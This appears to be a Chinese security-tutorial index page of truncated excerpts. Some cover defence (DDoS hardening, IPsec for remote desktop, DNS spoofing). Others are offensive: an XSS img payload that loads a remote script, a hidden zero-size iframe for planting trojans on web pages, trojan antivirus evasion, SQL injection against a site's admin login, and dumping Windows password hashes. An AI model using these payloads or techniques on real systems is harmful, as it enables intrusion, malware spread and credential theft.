小编 安全教程 对Linux服务器的四种入侵级别 随着Linux企业应用的扩展,有大量的网络服务器使用Linux操作系统。Linux服务器的安全性能受到越来越多的关注,这里根据Linux服务器受到攻击的深度以级别形式列出,并提出不同的解决方案。 对Linux服务器攻击的定义是:攻击是一种旨在妨碍、...
小编 安全教程 教你如何在XSS中再插JS <img src="javascript:try{var s=document.createElement(\’script\’);s.src=\’http://XSS/XSS.js\’;...
小编 安全教程 木马免杀绝招以及常用的修改方法 常用的木马免杀方法绝招一:快速搞定瑞星文件查杀操作步骤: 第一步:用OD载入,来到程序的入口点。 …常用的木马免杀方法 绝招一:快速搞定瑞星文件查杀 操作步骤: 第一步:用OD载入,来到程序的入口点。 第二步:把入口点的第一句PUSH...
小编 安全教程 怎样封锁随身WIFI、怎样封堵无线路由、怎样禁止无线网卡 现在的年轻上班一族,通常都是人手1-2部智能手机,上班时间大家通常都会连接公司的无线网络,如果不知道无线密码,可以在电脑上安装随身wifi、无线路由等,总之可以有很多种方式“蹭网”。这些行为会直接影响正常工作,降低工作效率,同时...
小编 安全教程 菜鸟玩注入之找后台篇 先把目标网站打开 现在开始找注入点…如图: 然后手工检测 and 1=1 返回信息正常 该点可以注入 恭喜,该URL可以注入!数据库类型:Access数据库 现在用明小子来猜解用户和密码 这里菜鸟门应该都会,我就不做演示了 看操作 用户名a...
小编 安全教程 黑客对社交网站攻击的常见五大手法(图文) Facebook、Twitter、LinkedIn等社交网站在这几年迅速窜红,成为人们网路生活中不可或缺的部分。人潮涌到哪、就成为黑客新目标,社交网站正是不法份子窃取个人资料的新乐园。安全公司赛门铁克揭示社交网站上的六大攻击手法,并呼吁使用者在社交网站...
小编 安全教程 使用IPsec加密通道远程登录3389的方法 开始-运行-输入“SECPOL.MSC”,打开IPsec。 详细步骤如下:(图解) 首先在远端服务器上进行设置: 然后在本机进行设置:步骤和上面的基本上一样, 除了第9步,本机设置如下图所示:
小编 安全教程 DNS欺骗 定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并...
小编 安全教程 抓取管理员hash值(哈希)的另类方法 今天抓hash的时候发现GetHashes.exe不好使..另外又测试了几个也都不好用… 不同版本的Windows的hash获取方法不一样. 用到的工具有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5...
小编 安全教程 详解挂马方法和技巧 1,挂马的N种方法 (1) HTML挂马法。 常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0>&l...
小编 安全教程 分析cookies的注入方法和原理 现在很多网站都采用了通用防注入程序,那么对于这种网站,我门是否就束手无策了呢?答案是否定的,因为我们可以采用cookie 注入的方法,而很多通用防注入程序对这种注入方式都没有防备。 在讲之前,我们还是来回顾下ASP脚本中Request对象的知识吧,上面...
小编 安全教程 如何有效的抵抗DDOS的方法介绍 DDOS的损害我这里就不说了,咱们可以经过批改注册表来减小DDOS对咱们的损伤。 1)设置生计时刻 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters DefaultT...